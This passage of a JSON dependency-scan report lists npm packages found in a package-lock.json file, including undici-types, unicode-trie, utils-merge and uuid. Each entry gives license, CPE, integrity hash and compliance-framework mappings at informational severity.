"1.2.0", "id": "730b4341f8da3a62", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: undici-types 6.21.0", "title": "undici-types 6.21.0", "description": "Package discovered: undici-types 6.21.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9968e425c772df9f", "name": "undici-types", "version": "6.21.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:undici-types:undici-types:6.21.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:undici-types:undici_types:6.21.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:undici_types:undici-types:6.21.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:undici_types:undici_types:6.21.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:undici:undici-types:6.21.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:undici:undici_types:6.21.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/undici-types@6.21.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a49eb5c706dbb178", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: unicode-properties 1.4.1", "title": "unicode-properties 1.4.1", "description": "Package discovered: unicode-properties 1.4.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "541fbe3121e73dce", "name": "unicode-properties", "version": "1.4.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:unicode-properties:unicode-properties:1.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode-properties:unicode_properties:1.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode_properties:unicode-properties:1.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode_properties:unicode_properties:1.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode:unicode-properties:1.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode:unicode_properties:1.4.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/unicode-properties@1.4.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.4.1.tgz", "integrity": "sha512-CLjCCLQ6UuMxWnbIylkisbRj31qxHPAurvena/0iwSVbQ2G1VY5/HjV0IRabOEbDHlzZlRdCrD4NhB0JtU40Pg==", "dependencies": { "base64-js": "^1.3.0", "unicode-trie": "^2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d33b9ca7e3f48cc1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: unicode-trie 2.0.0", "title": "unicode-trie 2.0.0", "description": "Package discovered: unicode-trie 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "aac566dbf0b492ea", "name": "unicode-trie", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:unicode-trie:unicode-trie:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode-trie:unicode_trie:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode_trie:unicode-trie:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode_trie:unicode_trie:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode:unicode-trie:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:unicode:unicode_trie:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/unicode-trie@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz", "integrity": "sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ==", "dependencies": { "pako": "^0.2.5", "tiny-inflate": "^1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4121fde58e5100ef", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: unpipe 1.0.0", "title": "unpipe 1.0.0", "description": "Package discovered: unpipe 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "294cc6dab10e14ff", "name": "unpipe", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:unpipe:unpipe:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/unpipe@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz", "integrity": "sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0c87db67edbd6edf", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: update-browserslist-db 1.2.3", "title": "update-browserslist-db 1.2.3", "description": "Package discovered: update-browserslist-db 1.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7776752fe1d43a3e", "name": "update-browserslist-db", "version": "1.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:update-browserslist-db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update-browserslist-db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update_browserslist_db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update_browserslist_db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update-browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update-browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update_browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update_browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:update:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/update-browserslist-db@1.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz", "integrity": "sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==", "dependencies": { "escalade": "^3.2.0", "picocolors": "^1.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1ae47d19bb25f29a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: util-deprecate 1.0.2", "title": "util-deprecate 1.0.2", "description": "Package discovered: util-deprecate 1.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "aac5900c84ec45ff", "name": "util-deprecate", "version": "1.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:util-deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:util-deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:util_deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:util_deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:util:util-deprecate:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:util:util_deprecate:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/util-deprecate@1.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ea9355f8957e8bab", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: utils-merge 1.0.1", "title": "utils-merge 1.0.1", "description": "Package discovered: utils-merge 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4f715b1e9b38109a", "name": "utils-merge", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:utils-merge:utils-merge:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:utils-merge:utils_merge:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:utils_merge:utils-merge:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:utils_merge:utils_merge:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:utils:utils-merge:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:utils:utils_merge:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/utils-merge@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz", "integrity": "sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "236364fea165c402", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: uuid 10.0.0", "title": "uuid 10.0.0", "description": "Package discovered: uuid 10.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "21b622d3d64a2c86", "name": "uuid", "version": "10.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:uuid:uuid:10.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/uuid@10.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz", "integrity": "sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2fb790bc55d11030", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: uuid 8.3.2", "title": "uuid 8.3.2", "description": "Package discovered: uuid 8.3.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8cf0c19ede45d1bc", "name": "uuid", "version": "8.3.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:uuid:uuid:8.3.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/uuid@8.3.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3e2f0913d0055c91", "ruleId": 